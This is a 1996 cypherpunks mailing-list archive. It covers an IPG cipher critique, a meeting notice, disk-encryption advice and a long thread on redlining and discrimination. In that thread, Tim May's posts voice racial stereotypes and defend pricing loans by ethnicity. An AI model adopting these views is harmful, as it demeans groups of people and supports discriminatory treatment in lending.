In-Reply-To: <Pine.BSI.3.95.961211042446.5247B-100000@citrine.cyberstation.net>
Message-ID: <199612111543.JAA00732@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


wichita@cyberstation.net wrote:
> 
> 
> Igor,
> 
> I greatly appreciate the fact that you are looking at the algorithm.
> You have the general idea but I do not believe that you have spent
> enough time with it to understand what all is going on.
> 
> 
> For instance, be advised that all Bs and Cs are not random numbers 
> at all, but rather they are randomly selected from a previously selected
> set of values, so that there are no repeats and all Bs are less than the
> smallest possible C, and the sum of B plus C is always < 32761.
> Furthermore, either B or C, one and sometimes both, are prime numbers.

See my another reply, your requirements to A, B, and C above are not
good to produce "good numbers".

If C is 2*B and B is prime as you require, the only output from the
triplet you will see is two numbers.

igor

> You might have an A(i) value of zero, and will have it 1 in C(i)
> iterations, but you can never have a b value of 0, or a C values or zero.
> Nor can any set of:
> 
>           A(JV)=A(JV)+B(JV) MOD C(JV)
> 
> generate a partial set set of the possible C values because either the B
> value or the C value is prime. 
> 
> 
> Furthermore, initial A values are chosen so that A+ Bmax + Cmax is less
> than 32761.
> 
> Accordingly the circumstances that you describe cannot occur. The
> randomness referred to in the As, Bs, and Cs, result from the selection
> process, not from the values themselves. It goes without saying that
> using random values would not work, for the reason that you mention
> plus other. 
> 
> For instance, there are no repeats between any of the As, Bs, and Cs which
> is one indication that they are not random. To the contrary, the pool of
> numbers are selected numbers, approximately 66% prime and 33% nonprime,
> which maximizes the covariance, in a LP sense, with the modulos 4096 and
> 256.
> 
> The selection process uses a key, generated by the user from the timing of
> keystrokes, to select the which As, Bs and Cs will actually be used. I
> tried to explain this in the detailed algorithm explanation. at the web
> site.
> 
>  	
> 
> 
> On Sat, 30 Nov 1996, Igor Chudov @ home wrote:
> 
> > Igor Chudov @ home wrote:
> > > 
> > > Hi,
> > > 
> > > I was sort of tired of endless talk that "IPG algorithm was not 
> > > peer-reviewed, blah blah blah, so we won't even look at it, 
> > > blah blah blah", and decided to look at what Don Wood writes and
> > > try to see how his program actually works. 
> > > 
> > > Of course, I am not an expert in cryptography, and will appreciate all
> > > corrections. The web page to look at is http://www.netprivacy.com/algo.html,
> > > and it describes IPG algorithm in some detail.
> > > 
> > > First of all, the description of the algorithm is extremely unclear. I
> > > understand that this may be Don Wood's writing style, but it is certainly 
> > > not the most efficient style for precise communications. I suggest that
> > > Don tries to rewrite his description to be more structured.
> > > 
> > > Second, I seriously suspect that his algorithm of "trimming" is NOT
> > > going to work right. Just to remind everyone, he generates pseudo-random
> > > A(JV), B(JV), C(JV) such that
> > > 
> > > 	16384 <  C < 20361
> > > 	         B < 12227
> > > 	A arbitrary (at least the web page contains no restrictions 
> > > 	  on the value of A).
> > > 
> > > and then goes on to "trimming" -- a process that obtains a new value
> > > of A that is LESS than 16384 through this algorithm: 
> > > 
> > >        DO
> > >          JV=JV+1
> > >          IF JV=53 THEN JV=0
> > >          A(JV)=(A(JV)+B(JV)) MOD C(JV)
> > >        UNTIL A(JV)<16384
> > > 
> > > We shall first note that THERE ARE CASES WHEN THIS ALGORITHM WILL NEVER
> > > STOP! For example, if all A values are _initially_ 16385 and all C
> > > values are 16386 and all B's are 0, it is obvious that the pseudocode 
> > > above will be stuck in endless loop.
> > > 
> > > No good for IPG algorithm.
> > > 
> > > in fact, if only some triplets of A, B, and C have B == 0 and 16384 < A < C,
> > > these triplets will always be ignored (skipped) by his trimming process.
> > 
> > Note also that if B(K) == 1, his algorithm will need to make C passes
> > through the loop for JV == k, in order to generate a new value of A(JV).
> > 
> > This is very inefficient and results in a bias for triplets with high
> > Bs -- because they will generate good A(JV) more frequently.
> > 
> > 	- Igor.
> > 
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@pgp.com>
Date: Wed, 11 Dec 1996 10:06:47 -0800 (PST)
To: pgp-mime@purpletape.cs.uchicago.edu
Subject: Cypherpunks December Meeting (SF Bay Area)
Message-ID: <v03100b00aecbc1318d5c@[205.180.136.70]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


     [wide distribution: please excuse any duplicates you may receive]

Salutations,

The Cypherpunks December 96 Physical Meeting is being hosted by Pretty Good Privacy, Inc. We've rented a meeting room at the Hotel Sofitel (see below) that can accomodate ~100 people. There will be munchies, and I think this qualifies as a cypherpunk milestone of sorts, so I hope lots of you show up.

Please see <http://www.pgp.com/961214.html>.


General Info:

1) RSVP's
Please RSVP ASAP to <mailto:ddt@pgp.com?subject=cpunks-mtg-rsvp> if you plan to attend (reply to this with "cpunks-mtg-rsvp" as the Subject). It's very important that I have a clear idea of how many humans plan to attend as soon as possible, because we're also providing refreshments/snacks which we need to order from the hotel in advance. Thanks.

2) Location/Time
We'll be holding this "Open Meeting on US Soil" at the:

 Hotel Sofitel
 223 Twin Dolphin Drive
 Redwood Shores CA 94065
 415.598.9000 tel

Meeting time is 11 AM - 5 PM (a Sofitel time slot), as we have to be out of the room shortly after 5 PM for a wedding setup).

The Sofitel is a block or two south of the shining Oracle towers on Twin Dolphin Drive, which is easily accessible from Hwy 101 (on the east/SF Bay side of the freeway) in Redwood City (12 miles south of SFO airport and a few miles south of the Hwy 92/San Mateo Bridge junction as references).

There are directions and a simple GIF map at the meeting info URL.
 <http://www.pgp.com/961214.html>.

NOTE: when you arrive at the Sofitel, look for signage pointing to the exact room we're meeting in, or inquire at the main desk. Bring your friends.

3) Demos
If you want to demo something at the meeting, tell me ASAP(!). We encourage anyone who has anything Cypherpunks-related to present (even stuff that's already been seen before but which has been updated) to bring/show it. I'm going to set the arbitrary cutoff date for demo reservations as 11:59 PM on Thursday 12 December: we can have the right equipment ready for you if you list what you need in detail. If you wait until the last minute and bandwidth is limited, we may not be able to fit you in, unless you have something very simple to show, so please bear that in mind.

There will be overhead projection and an RGB projector available. Net connections can be arranged with advance notice. Right now, we have not arranged anything beyond a Metricom modem (28.8Kbps), but we can arrange an analog modem line or even an ISDN if there's a specific need. Tell me soon(!).

4) Handouts/Door Prizes/Raffle
Handouts are welcome: please give me your stack of handouts for the table when you arrive. If you want to pass out detailed mailbomb instructions, please do it outside the building at your own risk (inside the meeting, please refrain from getting PGP Inc in trouble, we do enough of that ourselves already ;).

There will be door-prizes from PGP, but supplies are limited if 100 people show up. We may also raffle off some software (upgradable when our new stuff comes out).

5) PGP Key "Thing"
Bring a printout of your key fingerprint/key. Or a diskette version, or both. We'll have a key exchange/signing session at the end of the meeting.

6) PGP/MIME BOF at the IETF
The IETF's PGP/MIME BOF is Friday 13 Dec, 9:00-11:30 AM (Crystal Room, Fairmont Hotel, 170 South Market St. in Downtown San Jose, 408.998.1900 main). Since it's a Birds Of a Feather session, I think interested people in the San Jose area can show up if they want. Please come by if you want to help support RFC 2015 so PGP/MIME can take the next step toward IETF Working Group discussion so we can eventually move it to the IETF Standards Track process. Anyone who's at the IETF is encouraged to stay over until Saturday and come to the Cypherpunks meeting too!

- --

I hope to see everyone there! If you have questions about any of this, email me (I'm at IETF this week, but I'm wireless). If there are any last-minute announcements before Saturday, I'll post them.

   dave

________________________________________________________________________
Dave Del Torto                                      +1.415.65432.31  tel
Manager, Strategic Technical Evangelism             +1.415.631.0599  fax
Pretty Good Privacy, Inc.                        http://www.pgp.com  web


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv
Comment: Verbum sapienti satis est.

iQCVAwUBMq7z7KHBOF9KrwDlAQHcRQP/b/FOYPca2tN9mRlJXoLhgeI1swGESUHs
5CzTNcFq92EeiEeNYgq6Ri/itAzovTbt75AvJdfULrHrA48sQ9QGZy/qedRjNv+q
w29a0olc9sRh3EpRvW83ioeju2pyJ5zynpu3wua8H5j6p4NAKJmnte0VzxL9n4KA
Ezgov90jxuc=
=j4Q1
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 11 Dec 1996 08:15:18 -0800 (PST)
To: pavelk@dator3.anet.cz
Subject: Re: Harddisk encryption ??
In-Reply-To: <199612111316.OAA00245@zenith.dator3.anet.cz>
Message-ID: <199612111610.KAA00971@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


i definately see a problem.

you encrypt all your data on that another computer, and then send this 
data over your LAN in the clear. the data can be compromised by snooping
at the network connection.

that sux, although you are protected against "physical theft". 

I suggest that you use PGP and DOS partitions to keep your files
instead.

poka

igor

Pavel Korensky wrote:
> 
> Hello,
> 
> I am trying to post this message once more. It seems that my first message
> somehow didn't find the way to the mail-list.
> 
> I have one problem which I would like to consult with you.
> I need to protect the data on the computer harddisk against physical theft.
> 
> Current situation:
> 
> Computer with several harddisks - approx. 9 GB. On this computer, the following
> OS are used: Linux, DOS, Windows NT. The data on this computer must be
> accessible from all operating systems. Encryption of files must be transparent
> to user and encryption algorithm must be "strong".
> 
> Because I am not able to find any disk encryption software which is able to run
> on all these platforms, I decided to use the following temporary solution:
> 
> Add one more computer with Linux OS. On this computer, there will be only a
> small root partition with necessary Linux components. All other disk space will
> be encrypted with IDEA, using the /dev/loop. This machine will be some kind of
> secure file server.
> On the second machine, where the user works, there will be partitions with
> operating systems, necessary utilities and the TCP/IP stack for DOS/Windows, NT
> and Linux. The data and application disks will be mounted via NFS and user will
> work with files from file server.
> The computers will be interconnected with Fast Ethernet. This mini-network is
> NOT connected to the Internet, so the NFS (in)security should not be a problem. 
> Also, both computers will be placed in the same room (distance approx. 3 m), so
> there should be no problem with tapping/data capturing on the Fast Ethernet
> connection.
> 
> I have the following questions.
> 
> Can anybody see some major security hole in this system ?
> How fast will be this system ?
> Anybody has any idea if there is some more sophisticated solution for this
> problem ? 
> Anybody heard about some strong disk encryption which is able to rund under
> Windows NT, Linux and DOS ? It seems that the Win NT are the major problem. I am
> not able to find any disk encryption for NT.
> Anybody is able to port Secure File System to Windows NT ? I am trying to port
> this program under Linux, but I am not the NT system programmer.
> 
> Thanx for any comments, help, ideas etc.
> 
> 
> Best regards
> 
> 
> PavelK
> 
> 
> --
> ****************************************************************************
> *                    Pavel Korensky (pavelk@dator3.anet.cz)                *
> *     DATOR3 Ltd., Modranska 1895/17, 143 00 Prague 4, Czech Republic      *
> *  PGP key fingerprint: 00 65 5A B3 70 20 F1 54  D3 B3 E4 3E F8 A3 5E 7C   *
> ****************************************************************************
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 11 Dec 1996 08:19:14 -0800 (PST)
To: wichita@cyberstation.net
Subject: Re: IPG Algorith Broken!
In-Reply-To: <Pine.BSI.3.95.961211013254.11832B-100000@citrine.cyberstation.net>
Message-ID: <199612111612.KAA00999@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


wichita@cyberstation.net wrote:
> This is just another example or more pendant pap. Obviously, you like
> Paul, do not know what you are talking about. You have read some
> textbooks and think that makes you are an expert. I suggest that you take
> some time off and learn some IT and what an OTP is. It most certainly is
> not two identical random number series. 

what is IT?

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 11 Dec 1996 08:17:32 -0800 (PST)
To: m5@vail.tivoli.com
Subject: Re: [OFF-TOPIC]Re: PICS is not censorship
In-Reply-To: <32AE0747.2CA5@tivoli.com>
Message-ID: <199612111636.KAA01346@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


Mike said:
> Gemini Thunder wrote:
> > There are universally valid truths.  You implicitly admit so by
> > stating "...at most, one religion is correct".
> No, he didn't; he said "at most".  I personally think none is correct,
> and I don't agree there are universally valid truths.  I defy you to
> explain how you know that to be so.
> 

Universally valid truths:

     Down is towards the nearest object of gravitational attraction that 
you are influenced by. Up is away.

     E=mc^2.

> > The problem is we can not always determine what the universally valid
> > truth is (especially so in moral/religious matters)
> Then why do you think there is such a thing?

     To think outherwise would imply a non-casual universe.

> > so we tend to cop-out 
> Why is it a "cop-out" to accept the limits of human perception?

     Most people who "Accept their limits" never manage to get beyond them.

> > and say there are no truths, or something 
> > along the lines of:
> > "Well, that might be right for you, but not for me."
> > or the one I love to hate:
> > "Perception is reality."
> How do you know reality is something other than perception if you
> don't perceive it to be so?

    Collusion (spelling?). Two or more observers get together and compare 
perceptions. If their perceptions are noot the same, or at most similar, 
then perception is _not_ reality.

     HTH.



Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: C Matthew Curtin <cmcurtin@research.megasoft.com>
Date: Wed, 11 Dec 1996 08:06:42 -0800 (PST)
To: cypherpunks@toad.com
Subject: Utility of Snake Oil FAQ
Message-ID: <199612111559.KAA13478@goffette.research.megasoft.com>
MIME-Version: 1.0
Content-Type: text/plain



Got a bit of an update for everyone who was interested in the utility
of the Snake Oil FAQ. Tim May raised the issue that it seems likely
that a usenet FAQ will only reach people sufficiently clued to look
for a usenet FAQ, which probably means they're clued enough to already
know what's in the FAQ. I myself had this concern, but went ahead
taking everyone's input and working on it anyway.

I received at least a half dozen requests from folks wanting to
include it in internal memorandums, reference it in other
(nontechnical) works about Internet and security issues, etc.

It would seem that the message is getting out (admittedly slowly,
perhaps at the rate of two a month), but I suspect that as more
attention is brought to it, we'll continue to reach more people who
need to see it.

-matt

P.S. For those of you who have tuned in late, the URL is
http://www.research.megasoft.com/people/cmcurtin/snake-oil-faq.html

-- 
Matt Curtin  cmcurtin@research.megasoft.com  Megasoft, Inc   Chief Scientist
http://www.research.megasoft.com/people/cmcurtin/   I speak only for myself.
Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet Intranet




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven Levy <steven@echonyc.com>
Date: Wed, 11 Dec 1996 08:07:49 -0800 (PST)
To: Derek Bell <dbell@maths.tcd.ie>
Subject: Re: Codebreakers on the shelves!
In-Reply-To: <9612101953.aa22445@salmon.maths.tcd.ie>
Message-ID: <Pine.SOL.3.91.961211110101.6734A-100000@echonyc.com>
MIME-Version: 1.0
Content-Type: text/plain


The events occuring after the finish of the original codebreakers 
(beginning the seventies, and including public key, Clipper ,etc) and 
covered lightly in the rewrite will be at the center of my book CRYPTO, 
which I am still finishing. Meanwhile, the re-release of Codebreakers 
is a firm reminder of Kahn's awesomeness.

Steven

On Tue, 10 Dec 1996, Derek Bell wrote:

> In message <v03007806aed2ec6f864a@[207.167.93.63]>, "Timothy C. May" writes:
> >As near as I can tell, from the comments by Kahn and from looking at it,
> >the new edition is _exactly_ the same as the 1967 edition, with the
> >exception of one additional chapter. The last chapter covers the Enigma
> >story in detail.
> 
> 	Is it based on the abridged or unabridged edition?
> 
> >I'm hoping the new edition of Bamford is handled better.
> 
> 	Any news as to a possible release date for that book?
> 
> 	Derek
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Wed, 11 Dec 1996 11:08:42 -0800 (PST)
To: cypherpunks@toad.com
Subject: The Redlining Topic
Message-ID: <199612111908.LAA24332@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain



At 3:05 AM 12/11/1996, drose@AZStarNet.com wrote:
>Matthew J. Miszewski wrote:
>Many people of good will find racial discrimination to be abhorrent.
>OTOH, I'm sure that as an attorney you are cognizant of the fact that
>financial institutions have a fiduciary responsibility to their
>shareholders.
>
>In any case, have you given any consideration to taking your
>well-meaning but off-topic thoughts to any one of a number of perhaps
>more appropriate fora?

A discussion of redlining is very much on topic for cypherpunks.

Capital markets and their (alleged) inefficiencies are very close to
the heart of cypherpunk thinking.  A thread we haven't pursued, but
will likely get to, is the ways in which inefficiencies are typically
introduced by the government, even in the case of redlining.  After
that point is made, a discussion of the ways in which cryptoanarchy
will circumvent governmental scheming will certainly be germane to
this forum.

Discussions of the nature of bigotry and racial discrimination lie
very close to the cypherpunk thinking.  In a cryptoanarchy it will be
very hard to enforce our ideas of what other people should think.
Affirmative action, anti-redlining laws, etc., will likely become far
less effective.  Disaster?  No, a blow struck for human dignity and
freedom.

Similarly, allegedly well-meaning programs to help the poor through
seizure of other people's assets will not do well in a cryptoanarchy.
Is this a terrible outcome?  Not really.  The reasons why are worth
discussing and they are worth discussing in this forum.

The cypherpunks list benefits from a wide ranging discussion.  This
was one of the original ideas of the group and is, presumably, why it
is a completely open mailing list.  These sorts of complaints are
particularly inappropriate now that there are two other restrictive
mailing lists available for those who want them.  One is coderpunks.
The other is Perry Metzger's cryptography list.

A wide ranging discussion is beneficial because it allows us to truly
explore our ideas.  Not only do we then achieve a deeper
understanding, but completely new ideas also arise.  "Let a hundred
flowers bloom, let a hundred schools of thought contend."

I note that in your comments above, you couldn't resist making a
comment which is, apparently in your view, off topic.  I would
encourage you to pursue these ideas.  You obviously find them
interesting.

Rather than making killjoy comments, which do nothing to promote the
discussion, perhaps you should consider posting long thoughtful posts
which you believe would raise the level of discourse in this forum.

Barring that, learn how to use a killfile.  You can killfile on
subject line.  You can killfile on origin.  (I sign my posts
consistenly, so they can be killfiled, even though I am posting
through the remailers.)

Red Rackham






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Douglas Barnes <cman@c2.net>
Date: Wed, 11 Dec 1996 11:27:17 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Redlining
Message-ID: <2.2.32.19961211192516.00b72708@blacklodge.c2.net>
MIME-Version: 1.0
Content-Type: text/plain



Another interesting aspect -- there's been huge growth in the "making
loans to folks with non-traditional or bad credit histories" market
recently, as the market for folks with good credit histories has 
become saturated. This has been done largely by various NBFIs operating
outside of the normal "bank" structure, and specializing in certain
kinds of consumer loans.

It is vitally important to realize that to a bank, a loan is a "product,"
that they "sell" to customers.  It is how the bank makes money. If
the market is operating properly, irrational refusals to loan on the
part of some institutions will create a market opportunity for other
institutions.

The problem with banking & financial services is that they are already
so heavily regulated, and the barrier to entry is so high, that the
market seldom operates properly. Thus we see _more_ regulation piled
on (such as the CCRI) to address the problems that come about from the
previous piling-on of regulations. 

When there is little competition between banks, this creates a situation 
which, viewed in isolation, seems "unfair" to those at the fringes of the 
loan market. The superficial answer to this problem is to force banks
to lend in areas that are less profitable for them than their traditional
areas -- at this point banks almost begin to resemble monopoly public
utilities, which, when you look at the regulations they operate under,
is almost the case.

The more enlightened answer is to back off enough on the regulation so
that marginal loan markets become attractive business opportunities,
and any truly irrational lending practices (e.g. based on race) lead 
directly to losing business to a competitor.

Doug

At 11:31 AM 12/11/96 EDT, you wrote:
>From:	IN%"mjmiski@execpc.com"  "Matthew J. Miszewski" 11-DEC-1996 03:52:03.23
>
>>This is the essence of, at least, my disagreement with you Red.  I dont
>>agree that redlining doesnt harm people.  You see no harm.  I do.
>
>	Of course redlining causes harm to those who are redlined... they
>can't get credit. But the same can be said of any system of keeping
>track of who is likely to repay credit; it means that someone who has
>defaulted on past loans won't get future ones. Quite simply, while I
>would agree with you that racism certainly persists (it would be
>difficult for me to grow up in the South and not see this), I would
>argue that you have no evidence for that the basic motivation behind
>redlining is that the people in such areas are less likely to repay
>credit.
>	-Allen
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 11 Dec 1996 08:28:02 -0800 (PST)
To: mjmiski@execpc.com
Subject: Re: Redlining
Message-ID: <01ICVRN4ZPMOAEL6R8@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"mjmiski@execpc.com"  "Matthew J. Miszewski" 11-DEC-1996 03:35:52.25

>My question was a real one.  The basis of it comes from my work with the
>homeless in which they have a difficult time getting a job because they
>have no "home address" to put on the forms, some do not have or remember
>their SSNs, etc.  This causes a cyclic problem for the homeless.  My
>question to Tim was, in the real world, how is the protection of this data
>feasible.

	And what institution ultimately requires the SSN and a considerable
number of these other pieces of information? What institution puts a
considerable number of roadblocks in the way of getting a post office box,
for use as a home address, without a "home address"?

>I do have responses to each of your "points" in your last post, but have
>found the process of responding point-by-point tedious and non-productive

	If you've got such responses, please give them. They may very well
be tedious; I'd disagree about them being non-productive, based on my
past experience. Without such responses from you to some very well-reasoned
arguments, we are left with the equivalent of the Feds on cryptography, i.e.,
"if you knew what we know you'd agree with us."
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 11 Dec 1996 08:33:07 -0800 (PST)
To: mjmiski@execpc.com
Subject: Re: Redlining
Message-ID: <01ICVRTK0606AEL6R8@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"mjmiski@execpc.com"  "Matthew J. Miszewski" 11-DEC-1996 03:52:03.23

>This is the essence of, at least, my disagreement with you Red.  I dont
>agree that redlining doesnt harm people.  You see no harm.  I do.

	Of course redlining causes harm to those who are redlined... they
can't get credit. But the same can be said of any system of keeping
track of who is likely to repay credit; it means that someone who has
defaulted on past loans won't get future ones. Quite simply, while I
would agree with you that racism certainly persists (it would be
difficult for me to grow up in the South and not see this), I would
argue that you have no evidence for that the basic motivation behind
redlining is that the people in such areas are less likely to repay
credit.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Wed, 11 Dec 1996 08:49:02 -0800 (PST)
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: verysign
Message-ID: <199612111645.LAA14878@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


http://www.verisign.com/cgi-bin/authdb/search.cgi

Click defense industries, enter a site url of www.

I suppose #2 can be seen as a vital part of the defense
establishment.. ;)

This really should be listed as 'under test.'  Enjoy yourselves.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gemini Thunder <gt@kdn0.attnet.or.jp>
Date: Tue, 10 Dec 1996 18:47:11 -0800 (PST)
To: m5@vail.tivoli.com
Subject: Re: [OFF-TOPIC]Re: PICS is not censorship
In-Reply-To: <4484.9612101411@misun2.mi.leeds.ac.uk>
Message-ID: <32AE206F.2D021C6D@kdn0.attnet.or.jp>
MIME-Version: 1.0
Content-Type: text/plain


Mike McNally wrote:
> 
> Gemini Thunder wrote:
> >
> > There are universally valid truths.  You implicitly admit so by
> > stating "...at most, one religion is correct".
> 
> No, he didn't; he said "at most".  I personally think none is correct,
> and I don't agree there are universally valid truths.  I defy you to
> explain how you know that to be so.

Simple.  Let us consider all religions:

Now, here are our possibilities:
1.  All are right
2.  One or more is right, the remaining are wrong
3.  None are right

One of these possibilities must be true, but we can not know which one.
(This is why "at most" is the very phrase that implictly admits there
must be some universal truth concerning the validity of religions)

> > The problem is we can not always determine what the universally valid
> > truth is (especially so in moral/religious matters)
> 
> Then why do you think there is such a thing?

Please see above. Not knowing something does not mean it does not exist.

> > so we tend to cop-out
> 
> Why is it a "cop-out" to accept the limits of human perception?

You are too quick to argue.  The statement that there must be some
universal truth even if we can not know what it is seems quite accepting
of the limits of human perception.

> How do you know reality is something other than perception if you
> don't perceive it to be so?

Simple.  A man may perceive he can fly unassisted.  However, once he
steps off the building the universal truth of gravity takes hold of his
ass.

-- 
_______________________
Powered by LINUX! -- .sig under construction
2[b] || !2[b] -- What's the question? It's a tautology!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 11 Dec 1996 11:42:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: "Bigotry" and related topics...a brief comment
In-Reply-To: <01ICVRN4ZPMOAEL6R8@mbcl.rutgers.edu>
Message-ID: <v03007801aed4bbe064e3@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:26 AM -0400 12/11/96, E. Allen Smith wrote:
>From:	IN%"mjmiski@execpc.com"  "Matthew J. Miszewski" 11-DEC-1996 03:35:52.25
>
>>My question was a real one.  The basis of it comes from my work with the
>>homeless in which they have a difficult time getting a job because they
>>have no "home address" to put on the forms, some do not have or remember
>>their SSNs, etc.  This causes a cyclic problem for the homeless.  My
>>question to Tim was, in the real world, how is the protection of this data
  ^^^^^^^^^^^^^^^
>>feasible.

I confess to have missed the original "question to Tim."

While Matthew M. has been energetic in his posts on this topic, I've been
skipping most of this particular debate for a couple of reasons:

1. The _general_ subjects of "bigotry" and "redlining" are not closely
related to themes of this list, though the implications of strong privacy
for these issues is certainly on topic. (And my views on these implications
are well known...I've seen no point to step in to the debate to repeat
them, and don't plan to argue with Matt M. about the "evils of bigotry.")

2. Many of the posts by Matt M. and "Red Rackham" and others have been so
massive, containing paragraph-by-paragraph rebuttals of political and
ethical points, that I've just given up on trying to follow the points.

If anyone has well-formed questions about how redlining and "bigotry" is
affected by strong cryptography and crypto anarchy, fire away. Just don't
bury them deep in a long diatribe about the evils of "prejudice" and
"discrimination."

(Personally, and off-topic for the list (so I'll be brief), the ills of our
society seem to me to have _very little_ to do with "prejudice." In fact,
most people are not "discriminating" enough, in the sense that
discrimination implies value judgements and assessments of probable success
based on data available. As someone noted, the Asian communities in the
U.S. are doing well and are quite "discriminatory" in lending policies. Get
used to it, as crypto anarchy will make coerced transactions even more
difficult. The racial and ethnic groups which are most into "victimology"
are the least successful--which is _cause_ and which is _effect_ may be
debatable to many of you, but the correlation is very clear....maybe it's
time they try something different, like getting their culture to embrace
learning, reading, science, math, and business success, instead of
glorifying victimization, crack cocaine, basketball stars, and pimps.)

--Tim May



Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alexander Chislenko <alexc@firefly.net>
Date: Wed, 11 Dec 1996 08:51:50 -0800 (PST)
To: dreamwave@cybercom.net
Subject: WEB: Yahoo/Firefly Website recommendation service
Message-ID: <3.0.32.19961211115710.00ce9cb0@pop.firefly.net>
MIME-Version: 1.0
Content-Type: text/plain


  Firefly Network Inc. has just launched a public beta of our website
recommendation service on My Yahoo!  This service is the result of a
partnership between Yahoo! Inc. and Firefly Network, Inc. in application
of Automated Collaborative Filtering (ACF) technology to the Web. 
  It allows users to find interesting websites interest and like-minded
people, and otherwise help the user navigate the vast domain of sites
and people in an intelligent and personalized way.

To access the service, please go to <http://my.yahoo.com/> and then click
on Firefly button (top right).

The recommendation system draws its intelligence from users' ratings.
At this point, the database is still small, so you may not get
recommendations in all categories and the ones you get may not be optimal.
However, as the system collects more ratings and learns more about your
personal preferences, you will notice better and better performance.

Your ratings will be included into the initial rating database and will
help shape experience of many people who will come to the system after you,
so please be considerate rating sites.

If you have any remarks on the quality of the system or its interface,
please send a message to <webfly-seeding@firefly.net>


---------------------------------------------------------------------------
Alexander Chislenko <sasha1@netcom.com>     www.lucifer.com/~sasha/home.html
Firefly Network, Inc.: <alexc@firefly.net>  www.ffly.com  617-234-5452
---------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@apple.com>
Date: Wed, 11 Dec 1996 11:55:13 -0800 (PST)
To: cypherpunks@toad.com
Subject: Check out today's Salon
Message-ID: <32AF118D.3970@apple.com>
MIME-Version: 1.0
Content-Type: text/plain


There's an article on Phil Zimmerman in today's Salon

http://www.salon1999.com/news/newsreal.html

Martin.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 11 Dec 1996 12:00:35 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Redlining
In-Reply-To: <01ICVRTK0606AEL6R8@mbcl.rutgers.edu>
Message-ID: <v03007802aed4c09f8265@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:31 AM -0400 12/11/96, E. Allen Smith wrote:
>From:	IN%"mjmiski@execpc.com"  "Matthew J. Miszewski" 11-DEC-1996 03:52:03.23
>
>>This is the essence of, at least, my disagreement with you Red.  I dont
>>agree that redlining doesnt harm people.  You see no harm.  I do.
>
>	Of course redlining causes harm to those who are redlined... they
>can't get credit. But the same can be said of any system of keeping
>track of who is likely to repay credit; it means that someone who has
>defaulted on past loans won't get future ones. Quite simply, while I
>would agree with you that racism certainly persists (it would be
>difficult for me to grow up in the South and not see this), I would
>argue that you have no evidence for that the basic motivation behind
>redlining is that the people in such areas are less likely to repay
>credit.

Whether to offer credit to some entity is, like many other such
transactions, an economic transaction which involves a number of factors:
interest rates charged, other uses for the money, expectation of payback,
government interference (distortions of markets), etc.

As with insurance in all its various forms, the decision process involves
_probabalistic assessments_ based on avialable information, such as from
past payback data, actuarial tables, the legal system, etc. By the nature
of such probabalistic assesments, certain "lumped" categories will have to
be used: age groups, sex, For example, here are just some obvious areas to
consider:

- age -- if under-25 persons have a 20% higher default rate on loans, "for
whatever reason," this will be a factor in setting rates or even in
granting a loan

- sex -- if women are generally twice as likely to repay a loan, this will
be a factor

- ethnicity -- if persons of Norwegian heritage are 4 times less likely to
default on a loan than persons of Blatislavan heritage are, a loan officer
would factor this in (absent government market distortions)

- education -- if college-educated persons are less likely to default than
high school dropout, etc.

...and so on...one could make a list of several dozen categories, then run
correlation tests of various sorts. This is clearly what banks and other
